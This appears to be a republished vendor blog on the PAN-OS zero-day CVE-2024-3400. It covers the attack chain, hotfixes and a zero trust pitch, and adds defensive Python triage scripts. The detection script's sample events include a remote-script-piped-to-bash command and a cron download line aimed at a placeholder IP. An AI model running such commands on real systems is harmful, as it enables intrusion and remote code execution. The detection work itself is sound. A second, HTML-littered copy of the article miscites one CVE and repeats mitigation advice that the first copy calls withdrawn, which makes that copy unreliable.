Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust

Published 2024-04-16 at https://jacksonholdingcompany.com/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust/

A Year of Critical Zero Days: Firewalls, VPNs, and More

This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets, a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network, specifically VPNs and firewalls.

Today, CVE-2024-3400 was added to this list. It is a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks' PAN-OS, the operating system that runs its firewalls; GlobalProtect is the component that provides VPN connectivity to remote users. The vulnerability carries a CVSS score of 10.0, the maximum possible severity, because it is reachable over the network by an unauthenticated attacker and, on affected PAN-OS versions and feature configurations, allows arbitrary code execution with root privileges on the firewall. According to Palo Alto Networks, it is being actively exploited in the wild.

No individual vendor can be immune from vulnerabilities. What these zero-day attacks show, however, is that legacy VPN- and firewall-based architectures put a single point of failure directly on the internet, creating significant risk for organizations. One of the key differentiators of a true zero trust architecture is that it dramatically reduces that attack surface: enterprises' assets, applications, servers, and devices are made invisible to attackers by hiding them behind a cloud-proxy architecture, which eliminates the need for the VPN and firewall products that are such frequent targets.

Attack Chain

Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability.

Attack Scenario

The following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers.

Initial Exploitation: the attackers scan for vulnerable GlobalProtect endpoints and exploit the command injection vulnerability.
Persistence: a cron job is used to download additional tools, including UPSTYLE, a Python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel).
Execution: commands are downloaded and executed from a remote location by piping wget output to bash.
Lateral Movement: in at least one case, the attackers pivoted internally across the affected network via SMB and WinRM.
Collection: the adversary attempted to obtain the domain DPAPI backup keys and targeted Active Directory credentials by copying the NTDS.DIT file. They also targeted user workstations, taking saved login data, cookies, and local state data for Chrome and Microsoft Edge along with the users' DPAPI keys; with these the attacker could recover the browser master key and decrypt the saved credentials and cookies. The attacker also copied configuration data from the firewall itself.
Exfiltration: the stolen files were staged in an externally accessible web directory on the firewall for later retrieval by the attacker.
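The behaviours in that scenario are what a defender can actually hunt for once the firewall's shell history, process telemetry and east-west flow logs are in a SIEM. The following stage-tagging triage is an added example written for this page; it is not Volexity, Unit 42 or Zscaler tooling. The Event layout is an assumed normalised process/network feed, and the hostnames, addresses and command lines in SAMPLE_EVENTS are constructed. It tags each event with the scenario stage it matches (remote script piped to a shell, cron persistence, SMB/WinRM sessions initiated by the firewall, NTDS.DIT or DPAPI backup-key access) and groups the hits per host so an analyst can see how far along the chain an intrusion got.

```python
"""Stage-tagging triage for the post-exploitation behaviour in the Attack Scenario.

Added example; not vendor tooling. Event is an assumed normalised feed layout and
SAMPLE_EVENTS are constructed records, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    host: str            # host the event was observed on (source host for network events)
    kind: str            # "process" or "network"
    cmdline: str = ""    # process events: full command line
    dst_port: int = 0    # network events: destination port
    src_role: str = ""   # network events: "firewall" when the source is the firewall


# (stage, description, pattern) applied to process command lines.
PROCESS_RULES = [
    ("Execution", "remote script piped to shell",
     re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:ba)?sh\b")),
    ("Persistence", "cron job written",
     # crontab invoked for anything other than listing (-l), or cron spool/dir touched
     re.compile(r"/etc/cron\.d/|/var/spool/cron/|\bcrontab\b(?!\s+-l\b)")),
    ("Collection", "NTDS.DIT / DPAPI backup key access",
     re.compile(r"ntds\.dit|ntdsutil|vssadmin\s+create\s+shadow|backupkeys?", re.I)),
]

# Ports a firewall's management plane has no business initiating sessions to.
LATERAL_PORTS = {445: "SMB", 5985: "WinRM", 5986: "WinRM over HTTPS"}


def classify(event):
    """Return the (stage, description) pairs that a single event matches."""
    hits = []
    if event.kind == "process":
        for stage, desc, pattern in PROCESS_RULES:
            if pattern.search(event.cmdline):
                hits.append((stage, desc))
    elif event.kind == "network" and event.src_role == "firewall":
        if event.dst_port in LATERAL_PORTS:
            hits.append(("Lateral Movement",
                         f"{LATERAL_PORTS[event.dst_port]} session initiated by the firewall"))
    return hits


def triage(events):
    """Group matched stages per host so an analyst can see how far the chain got.

    Returns {host: {stage: [description, ...]}}; hosts with no hits are omitted."""
    report = {}
    for ev in events:
        for stage, desc in classify(ev):
            report.setdefault(ev.host, {}).setdefault(stage, []).append(desc)
    return report


# Constructed sample telemetry (hostnames and addresses are illustrative).
SAMPLE_EVENTS = [
    Event("fw-edge-01", "process",
          cmdline="/bin/sh -c 'wget -qO- http://198.51.100.7/stage2.sh | bash'"),
    Event("fw-edge-01", "process",
          cmdline="/bin/sh -c \"echo '* * * * * wget -q http://198.51.100.7/u -O /tmp/u' | crontab -\""),
    Event("fw-edge-01", "process", cmdline="crontab -l"),            # benign listing, no hit
    Event("fw-edge-01", "network", dst_port=445, src_role="firewall"),
    Event("fw-edge-01", "network", dst_port=5985, src_role="firewall"),
    Event("dc-01", "process",
          cmdline=r'ntdsutil "ac i ntds" ifm "create full C:\Windows\Temp\ntds" q q'),
    Event("ws-042", "process", cmdline=r"C:\Windows\System32\notepad.exe"),
    Event("ws-042", "network", dst_port=445, src_role="workstation"),  # ordinary SMB, no hit
]

if __name__ == "__main__":
    for host, stages in triage(SAMPLE_EVENTS).items():
        print(host, {stage: len(v) for stage, v in stages.items()})
```

The network rule is deliberately narrow: SMB and WinRM from workstations are normal, so it only fires when the source is the firewall, which should never initiate those sessions. Tune the source-role mapping to your own asset inventory before relying on it.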

Vendor Recommendations

Update 04/15/24: Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of April 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, and PAN-OS 11.1.2-h3. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days.

Until a device is upgraded to a fixed PAN-OS version, Palo Alto Networks initially advised customers to temporarily disable device telemetry as an alternative mitigation. Note that the vendor subsequently revised this guidance: disabling device telemetry is no longer considered an effective mitigation, so the upgrade should not be deferred on that basis, and the vendor advisory should be checked for the current hotfix list and Threat Prevention signatures. In all cases, customers should monitor the network for suspicious activity, review GlobalProtect and firewall logs for signs of exploitation, and follow security best practices.

Affected Versions

Version        Affected versions
PAN-OS 11.1    < 11.1.2-h3
PAN-OS 11.0    < 11.0.4-h1
PAN-OS 10.2    < 10.2.9-h1
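Reading that table across a fleet is error-prone because PAN-OS hotfix suffixes do not sort as plain strings ("10.2.9" is below "10.2.9-h1", while "11.1.3" is above "11.1.2-h3"). The following triage script is an added example written for this page, not Palo Alto Networks tooling. FIXED_BY is a snapshot of the table as of April 15, 2024, so a later hotfix on an older maintenance release (the page notes more were pending) must be added by hand; anything on a train the table does not list is reported as "unlisted" rather than "safe". The gp_configured flag reflects the vendor's scoping of the flaw to firewalls with a GlobalProtect gateway or portal configured. Hostnames and versions in SAMPLE_INVENTORY are constructed.

```python
"""Version triage against the Affected Versions table for CVE-2024-3400.

Added example; not vendor tooling. FIXED_BY mirrors the page's table as of
April 15, 2024 and must be refreshed from the current advisory."""
import re

# maintenance train -> first fixed release, copied from the page's table
FIXED_BY = {
    "10.2": "10.2.9-h1",
    "11.0": "11.0.4-h1",
    "11.1": "11.1.2-h3",
}

_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(version):
    """'11.1.2-h3' -> (11, 1, 2, 3). A release with no hotfix gets hotfix 0,
    which correctly sorts below '-h1'. Raises ValueError on anything else."""
    match = _VERSION.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def status(version, gp_configured=True):
    """Classify one device.

    'not-exposed' : GlobalProtect not configured, so the vulnerable code path is
                    not reachable (still patch, but it is not an emergency)
    'unlisted'    : maintenance train absent from the table; do not treat as safe,
                    check the current vendor advisory
    'vulnerable'  : below the first fixed release for its train
    'fixed'       : at or above the first fixed release
    """
    parsed = parse_version(version)
    if not gp_configured:
        return "not-exposed"
    train = f"{parsed[0]}.{parsed[1]}"
    if train not in FIXED_BY:
        return "unlisted"
    return "vulnerable" if parsed < parse_version(FIXED_BY[train]) else "fixed"


def triage_fleet(inventory):
    """inventory: {hostname: (version, gp_configured)} -> {status: [hostnames]}.

    Hostnames within each bucket are sorted so the output is stable."""
    buckets = {}
    for host, (version, gp) in inventory.items():
        buckets.setdefault(status(version, gp), []).append(host)
    return {k: sorted(v) for k, v in buckets.items()}


# Constructed inventory; hostnames and versions are illustrative.
SAMPLE_INVENTORY = {
    "fw-edge-01": ("11.1.2-h2", True),    # one hotfix below 11.1.2-h3
    "fw-edge-02": ("11.1.2-h3", True),    # first fixed release
    "fw-dc-01":   ("10.2.9", True),       # base release sorts below 10.2.9-h1
    "fw-dc-02":   ("10.2.8-h3", True),    # older maintenance release, affected per the table
    "fw-lab-01":  ("11.0.4-h1", False),   # no GlobalProtect configured
    "fw-old-01":  ("10.1.11-h4", True),   # 10.1 train is not in the table
}

if __name__ == "__main__":
    for bucket, hosts in sorted(triage_fleet(SAMPLE_INVENTORY).items()):
        print(f"{bucket:12} {', '.join(hosts)}")
```

The comparison works on the parsed tuple (major, minor, maintenance, hotfix), which is why "10.2.9" lands in the vulnerable bucket while "11.1.3" does not; a string comparison would get both of those wrong.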

The problem is legacy technology

The GlobalProtect vulnerability is the latest in a long line of VPN- and firewall-related security flaws. It is only April, and we have already seen critical CVEs for Ivanti, SonicWall, Fortinet, and Cisco VPN products. This shows that the problem is not any one vendor but the legacy architecture itself: a remote-access appliance that must be reachable from the internet is a prime target for threat actors. VPNs were first used in 1996, a time when many of today's complex and sophisticated cyberattacks did not exist. Traditional firewalls have been around even longer. Nearly three decades later, threat actors are still regularly finding ways to exploit these technologies.

These assets expose organizations to enormous risk because:

They are externally exposed: 'if it's reachable, it's breachable'.
Once compromised, they provide a beachhead into the corporate environment, leading to lateral propagation, data exfiltration, and compromise of the entire environment.

The fundamental problem with VPNs and firewalls is that they create a public-facing point of contact with the outside world. They give sophisticated threat actors a standing target to attack until they find a way in, for example through a zero-day vulnerability. They bring both your users and, after a successful exploit, threat actors onto your network. Given the potential reward from a successful exploit, we will continue to see threat actors targeting VPNs and firewalls.

Recent zero-day vulnerabilities in exposed VPNs and firewalls

One recent case of legacy architecture leading to zero-day exploitation is the set of Ivanti Connect Secure vulnerabilities that were exploited from December 2023 and disclosed in January 2024. Chinese state-backed actors chained CVE-2023-46805 (an authentication bypass) with CVE-2024-21887 (a command injection) to run commands on Ivanti VPN appliances without credentials. Once these flaws were mitigated, Ivanti disclosed two further vulnerabilities, CVE-2024-21888 (privilege escalation) and CVE-2024-21893 (server-side request forgery in the SAML component); the SSRF was exploited in the wild to bypass the initial mitigation and keep access.

In February 2024, CISA released another VPN-related alert, this time about attacks on Cisco's Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD). The Akira ransomware group exploited CVE-2020-3259, an information disclosure flaw in the WebVPN/AnyConnect component, to steal data from the memory of unpatched appliances. That flaw was four years old rather than a zero-day, which only reinforces the point: whether the bug is brand new or long since patched, the exposed VPN endpoint is what gets attacked, and the real issue is the outdated architecture, not the specific vendors involved.

How zero-day threats enable the four-stage attack sequence

Enterprises should understand that attackers target vulnerabilities in their exposed, internet-connected assets. This includes firewalls and VPNs, which are among the primary vectors used to breach organizations and steal their data. Moreover, it is not only these initial assets that expose enterprises to enormous risk; it is also the underlying network architecture, which allows attackers, once they have compromised these initial assets, to move laterally, find enterprises' most critical applications and data stores, and steal their data.

Reconnaissance. Attackers scan for critical vulnerabilities in the external enterprise attack surface, including zero-day vulnerabilities in VPNs and firewalls.
Initial compromise. Threat actors exploit these VPN and firewall vulnerabilities to gain initial access to enterprise devices and the network.
Move laterally. Attackers establish persistence and move laterally across the network, scanning for high-value assets, stealing further credentials, and compromising additional systems.
Steal data. Once threat actors have reached your critical assets and data, they work to exfiltrate it from the network. In a ransomware operation they may additionally deploy the ransomware payload, often from a domain controller, to bring down the victim's environment.

Figure 3. The four-stage attack sequence.

How can enterprises reduce the impact of zero-day attacks?

While it will always be essential for enterprises to patch critical vulnerabilities, patching is a response to each individual zero-day after the fact. The only way to get ahead of this class of attack, rather than react to each one, is to adopt a zero trust architecture and take the exposed asset out of the equation altogether. Here are some fundamental zero trust principles that organizations can adopt to mitigate the risks of exposed assets like VPNs, firewalls, and more.

Eliminate Your Attack Surface: Implement Zero Trust. While the term 'zero trust' is heavily used (and abused), it is for good reason: zero trust principles, and the architecture that accompanies them, are the only way enterprises can overcome the risks of legacy networks, including vulnerabilities in firewalls and VPNs. These principles are not merely buzzwords applied to legacy products (a virtualized VPN or firewall is not zero trust); they are goals that require technological transformation and a cloud-first approach to accomplish.

Per the NSA Zero Trust Security Model, there are three fundamental principles enterprises should adopt.

Never trust, always verify. Enterprises should treat every user, device, application, workload, and data flow as untrusted by default. Moreover, users should never be connected to the underlying network, only directly to the applications they are authorized for, using a cloud-proxy architecture.
Assume a breach has happened. Particularly given the recent pace of zero-day vulnerability disclosures, enterprises should operate on the assumption that threat actors have already gained persistence in their environment and defend their crown-jewel applications, where their most critical data is stored, accordingly.
Verify explicitly with least-privilege access. Trust should be granted only after identity and contextual attributes have been established across the seven layers of zero trust security shown in Figure 4, and only for the specific resource requested.

Figure 4. Seven layers of security enabled with a Zero Trust architecture (in this case the Zscaler Zero Trust Exchange).

In practice, a zero trust architecture is fundamentally different from those built on firewalls and VPNs. Compared to traditional, perimeter-based networking approaches, which place users on the enterprise network, a zero trust architecture enables one-to-one connectivity between requesters and resources. This could include, for instance, users connecting to applications, but it could also enable connectivity between workloads, branch locations, remote users and operational technology (OT) systems, and much more.

A cloud native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange:

Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud.
Stops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real time.
Eliminates lateral threat movement by connecting entities to individual IT resources instead of extending access to the entire network.
Blocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use.

Best practices for enterprises

In light of these recent zero-day vulnerabilities, it is imperative that enterprises employ the following best practices to fortify their organization against potential exploits:

Minimize the attack surface: make apps (and vulnerable VPNs) invisible to the internet, so that an attacker cannot reach them to gain initial access.
Prevent initial compromise: inspect all traffic in-line to automatically stop zero-day exploits, malware, and other sophisticated threats.
Enforce least-privileged access: restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources.
Block unauthorized access: use strong multi-factor authentication (MFA) to validate user access requests.
Eliminate lateral movement: connect users directly to apps, not the network, to limit the blast radius of a potential incident.
Shut down compromised users and insider threats: enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data.
Stop data loss: inspect data in motion and data at rest to stop active data theft during an attack.
Deploy active defenses: leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real time.
Test your security posture: get regular third-party risk assessments and conduct purple team exercises to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results with your security team.

Conclusion

Today's zero-day vulnerability in Palo Alto Networks' GlobalProtect represents yet another unfortunate milestone in a clear enterprise trend: traditional, perimeter-based approaches to security and networking face systemic, not temporary, weaknesses that cannot be waved away with any single security patch. Of course, no vendor can be immune from software defects and vulnerabilities. However, given the back-to-back CVEs impacting firewalls, VPNs, supply chain tools, and more, it should be clear to security leaders and practitioners that zero trust security is crucial. Adopting a cloud-delivered zero trust architecture removes the attack surface created by legacy technology. Denying attackers their traditional beachheads, the vulnerabilities in VPNs, firewalls, and the like, is key to creating a more robust and secure environment.

References

https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/

https://unit42.paloaltonetworks.com/cve-2024-3400/

If you are concerned about these vulnerabilities, please contact Zscaler at ReplaceFWVPN@zscaler.com for a free external attack surface assessment as well as professional consultation on how you can migrate from legacy architectures to Zero Trust.

Acknowledgement for analysis: Atinderpal Singh, Will Seaton

\u200b<\/p>\n

This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets \u2014 a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network \u2014 specifically VPNs and Firewalls.\u00a0<\/p>\n

\u00a0<\/p>\n

Today,\u00a0CVE-2024-3400<\/a> was added to this list. This is a critical command injection vulnerability impacting Palo Alto Network\u2019s PAN-OS software used in its GlobalProtect Gateway, which is a firewall service that facilitates VPN connectivity, among other things. The vulnerability has a CVSS score of 10.0, the maximum possible severity, because it is exploitable by an unauthenticated user. For particular PAN-OS versions and feature configurations, this flaw may allow attackers to execute arbitrary code with root privileges on the firewall. According to Palo Alto Networks, this vulnerability is being actively exploited in the wild.\u00a0<\/p>\n

\u00a0<\/p>\n

No individual vendor can be immune from vulnerabilities<\/em>. However, what these zero-day attacks show is that legacy VPN & firewall-based architectures are vulnerable to a single point of failure, creating significant risk for organizations. One of the key differentiators of a true Zero Trust Architecture, meanwhile, is that it can dramatically reduce the attack surface of an organization. This is by making enterprises\u2019 assets, applications, servers, devices, and more invisible to attackers \u2014 hiding them behind a cloud-proxy architecture \u2014 while entirely eliminating the need for such VPN and firewall products that are such frequent targets for attack.\u00a0<\/p>\n

\u00a0<\/p>\n

Attack Chain<\/strong><\/h3>\n

\u00a0<\/p>\n\n

Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability.\u00a0<\/p>\n

\u00a0<\/p>\n

Attack Scenario<\/strong><\/h3>\n

The following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers.\u00a0<\/p>\n

\u00a0<\/p>\n

Initial Exploitation<\/strong>: the attackers scan for and exploit the command injection vulnerability.Persistence<\/strong>: use Cron job to download additional tools, including UPSTYLE, a python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel).Execution:\u00a0<\/strong>Download and Execute commands from remote location by piping wget output to bash.Lateral Movement<\/strong>: in at least \u200cone case, attackers pivoted internally across the affected networks via SMB and WinRM.Collection:<\/strong> the adversary attempted to obtain the domain backup DPAPI keys and targeted active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with users\u2019 DPAPI keys. Next, the attacker copied configuration data from the firewall device. Additionally, Login data, cookies, and local state data for Chrome and Microsoft Edge were also compromised. This enabled the attacker to obtain the browser master key and decrypt sensitive data.Exfiltration:\u00a0<\/strong>The stolen data files were saved to an externally accessible web directory for later retrieval by the attacker.<\/p>\n

Vendor Recommendations<\/h3>\n

Update 04\/15\/24:<\/strong> In response to this risk, Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of Apr 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3. Customers are advised to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days.\u00a0<\/p>\n

\u00a0<\/p>\n

In response to this risk,\u00a0Palo Alto Networks advises<\/a> customers to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Moreover, customers should monitor the network for any suspicious activity and follow security best practices.\u00a0\u00a0<\/p>\n

Affected Versions<\/h3>\n

\u00a0[[{“value”:”A Year of Critical Zero Days: Firewalls, VPNs, and more <\/p>\n

This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets \u2014 a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network \u2014 specifically VPNs and Firewalls. <\/p>\n

Today, CVE-2024-3400 was added to this list. This is a critical command injection vulnerability impacting Palo Alto Network\u2019s PAN-OS software used in its GlobalProtect Gateway, which is a firewall service that facilitates VPN connectivity, among other things. The vulnerability has a CVSS score of 10.0, the maximum possible severity, because it is exploitable by an unauthenticated user. For particular PAN-OS versions and feature configurations, this flaw may allow attackers to execute arbitrary code with root privileges on the firewall. According to Palo Alto Networks, this vulnerability is being actively exploited in the wild. <\/p>\n

No individual vendor can be immune from vulnerabilities. However, what these zero-day attacks show is that legacy VPN & firewall-based architectures are vulnerable to a single point of failure, creating significant risk for organizations. One of the key differentiators of a true Zero Trust Architecture, meanwhile, is that it can dramatically reduce the attack surface of an organization. This is by making enterprises\u2019 assets, applications, servers, devices, and more invisible to attackers \u2014 hiding them behind a cloud-proxy architecture \u2014 while entirely eliminating the need for such VPN and firewall products that are such frequent targets for attack. <\/p>\n

Attack Chain <\/p>\n

Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability. <\/p>\n

Attack ScenarioThe following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers. <\/p>\n

Initial Exploitation: the attackers scan for and exploit the command injection vulnerability.
\nPersistence: use Cron job to download additional tools, including UPSTYLE, a python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel).
\nExecution: Download and Execute commands from remote location by piping wget output to bash.
\nLateral Movement: in at least \u200cone case, attackers pivoted internally across the affected networks via SMB and WinRM.
\nCollection: the adversary attempted to obtain the domain backup DPAPI keys and targeted active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with users\u2019 DPAPI keys. Next, the attacker copied configuration data from the firewall device. Additionally, Login data, cookies, and local state data for Chrome and Microsoft Edge were also compromised. This enabled the attacker to obtain the browser master key and decrypt sensitive data.
\nExfiltration: The stolen data files were saved to an externally accessible web directory for later retrieval by the attacker.<\/p>\n

Vendor RecommendationsUpdate 04\/15\/24: In response to this risk, Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of Apr 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3. Customers are advised to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days. <\/p>\n

In response to this risk, Palo Alto Networks advises customers to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Moreover, customers should monitor the network for any suspicious activity and follow security best practices. <\/p>\n

Affected VersionsVersion<\/p>\n

Affected Versions<\/p>\n

PAN-OS 11.1<\/p>\n

< 11.1.2-h3<\/p>\n

PAN-OS 11.0<\/p>\n

< 11.0.4-h1<\/p>\n

PAN-OS 10.2<\/p>\n

< 10.2.9-h1<\/p>\n

The problem is legacy technologyThe GlobalProtect vulnerability is the latest in a long line of VPN and Firewall-related security flaws. It\u2019s April, and we have already seen critical CVEs for Ivanti, Sonicwall, FortiNet, and Cisco VPN solutions. This shows that the problem is not the vendor, but the vulnerable technology-driven legacy architecture that makes it a prime target for threat actors. VPNs were first used in 1996, a time when many of today\u2019s complex and sophisticated cyberattacks did not exist. Traditional firewalls have been around even longer. Nearly three decades later, threat actors are still regularly finding ways to exploit these technologies.<\/p>\n

These assets expose organizations to enormous risk due to the fact that:<\/p>\n

They are externally exposed \u2014 \u2018if it’s reachable, it’s breachable\u2019
\nTheir flawed architecture provides a beachhead into the corporate environments leading to lateral propagation, data exfiltration, compromising the entire environment.<\/p>\n

The fundamental problem with VPNs and firewalls is they create a public-facing point of contact to the outside world. They present sophisticated threat actors an opportunity to attack your organization until they discover a way in \u2014 think zero-day vulnerabilities. They bring both your users as well as threat actors (in the event of a successful exploit) onto your network. Given the potential reward from a successful exploit, we will continue to see threat actors targeting VPNs and firewalls. <\/p>\n

Recent zero-day vulnerabilities in exposed VPNs and firewalls <\/p>\n

One recent case of legacy architecture leading to zero-day exploits are the Ivanti vulnerabilities disclosed in December 2023. Multiple zero-day vulnerabilities in Ivanti\u2019s VPN products were exploited by Chinese state-backed hackers taking advantage of flaws described in CVE-2023-46805 and CVE-2023-21887. The adversaries used these vulnerabilities to perform authentication bypass and remote command injection. Once these flaws were patched, attackers bypassed the fixes by leveraging other vulnerabilities (CVE-2024-21888). The workarounds used to circumvent the initial patch allowed attackers to enable privilege escalation and perform server-side request forgery. <\/p>\n

In February 2024, CISA released another VPN-related alert about an attack on Cisco\u2019s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD). In this case, the Akira ransomware group exploited a vulnerability (CVE-2020-3259) to steal information by leveraging misconfigured instances of WebVPN\/AnyConnect. These repeated zero day attacks on VPN show that the real issue is the outdated architecture, not the specific vendors involved.<\/p>\n

How zero-day threats enable the four-stage attack sequence <\/p>\n

Enterprises should understand that attackers target vulnerabilities in their exposed, internet-connected assets. This includes firewalls and VPNs, which are among the primary vectors used to breach organizations and steal their data. Moreover, it is not only these initial assets that expose enterprises to enormous risk \u2014 it is also the underlying network architecture, which allows attackers, once they have compromised these initial assets, to move laterally, find enterprises\u2019 most critical applications and data stores, and steal their data. <\/p>\n

1. Reconnaissance. Attackers scan for critical vulnerabilities in the external enterprise attack surface, including zero-day vulnerabilities in VPNs and firewalls.
2. Initial compromise. Threat actors exploit these VPN and firewall vulnerabilities to gain initial access to enterprise devices and the network.
3. Move laterally. Attackers establish persistence and move laterally across the network, scanning for high-value assets, stealing other credentials, and compromising additional systems.
4. Steal data. Once threat actors have compromised your critical assets and data, they will work to exfiltrate it from the network. In the case of ransomware, attackers may additionally deploy ransomware, often leveraging a domain controller, to bring down the victim’s environment.

Figure 3. The four-stage attack sequence.

How can enterprises reduce the impact of zero-day attacks?

While it will always be essential for enterprises to patch critical vulnerabilities, the only meaningful way to stay ahead of these types of zero-day attacks is for organizations to adopt a zero trust architecture, which, from a first-principles perspective, avoids exposing these assets altogether. Here are some fundamental zero trust principles that organizations can adopt to mitigate the risks of exposed assets like VPNs, firewalls, and more.

Eliminate your attack surface: implement zero trust. While the term ‘zero trust’ is heavily used (and abused), it’s for good reason: zero trust principles, and their accompanying architecture, represent the only way enterprises can overcome the risks associated with legacy networks, including vulnerabilities in firewalls and VPNs. These principles are not merely buzzwords applied to legacy products (virtualized VPNs and firewalls are not zero trust) — they are goals that require technological transformation and a cloud-first approach to accomplish.

Per the NSA Zero Trust Security Model, there are three fundamental principles enterprises should adopt.

- Never trust, always verify. Enterprises should treat every user, device, application, workload, or data flow as untrusted. Moreover, enterprises should never connect users to the underlying network, but directly to applications using a cloud-proxy architecture.
- Assume a breach has happened. Particularly given the recent pace of zero-day vulnerability disclosures, enterprises should operate with an assumption that threat actors have already gained persistence in their environment and defend their crown jewel applications — where their most critical data is stored — accordingly.
- Verify explicitly with least-privilege access. Enterprises should allow trust only after seven layers of zero trust security, identity, and contextual attributes have been established.

Figure 4. Seven layers of security enabled with a zero trust architecture (in this case the Zscaler Zero Trust Exchange).

In practice, a zero trust architecture is fundamentally different from those built on firewalls and VPNs. Compared to traditional, perimeter-based networking approaches, which place users on the enterprise network, a zero trust architecture enables one-to-one connectivity between requesters and resources. This could include, for instance, users connecting to applications, but it could also enable connectivity between workloads, branch locations, remote users and operational technology (OT) systems, and much more.

A cloud-native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange:

- Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud.
- Stops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real time.
- Eliminates lateral threat movement by connecting entities to individual IT resources instead of extending access to the entire network.
- Blocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use.

Best practices for enterprises

In light of these recent zero-day vulnerabilities, it is imperative that enterprises employ the following best practices to fortify their organization against potential exploits:

- Minimize the attack surface: make apps (and vulnerable VPNs) invisible to the internet, and impossible to compromise, ensuring an attacker can’t gain initial access.
- Prevent initial compromise: inspect all traffic inline to automatically stop zero-day exploits, malware, or other sophisticated threats.
- Enforce least-privileged access: restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources.
- Block unauthorized access: use strong multi-factor authentication (MFA) to validate user access requests.
- Eliminate lateral movement: connect users directly to apps, not the network, to limit the blast radius of a potential incident.
- Shut down compromised users and insider threats: enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data.
- Stop data loss: inspect data in motion and data at rest to stop active data theft during an attack.
- Deploy active defenses: leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real time.
- Test your security posture: get regular third-party risk assessments and conduct purple team activities to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results of these reports with your security team.

Conclusion

Today’s zero-day vulnerability impacting Palo Alto Networks’ GlobalProtect Gateway product represents yet another unfortunate milestone in a clear enterprise trend: traditional, perimeter-based approaches to security and networking face systemic, not temporary, security weaknesses that cannot be waved away with any single security patch. Of course, no vendor can be immune from software defects and vulnerabilities. However, given the back-to-back CVEs impacting firewalls, VPNs, supply chain tools, and more, it should be clear to security leaders and practitioners that zero trust security is crucial. Adopting a cloud-delivered zero trust architecture removes the attack surface created by legacy technology. Denying attackers their traditional beachheads — the vulnerabilities in VPNs, firewalls, and the like — is key for creating a more robust and secure environment.

References

https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/

https://unit42.paloaltonetworks.com/cve-2024-3400/

If you are concerned about these vulnerabilities, please contact Zscaler at ReplaceFWVPN@zscaler.com for a free external attack surface assessment as well as professional consultation on how you can migrate from legacy architectures to zero trust.

Acknowledgement for analysis: Atinderpal Singh, Will Seaton
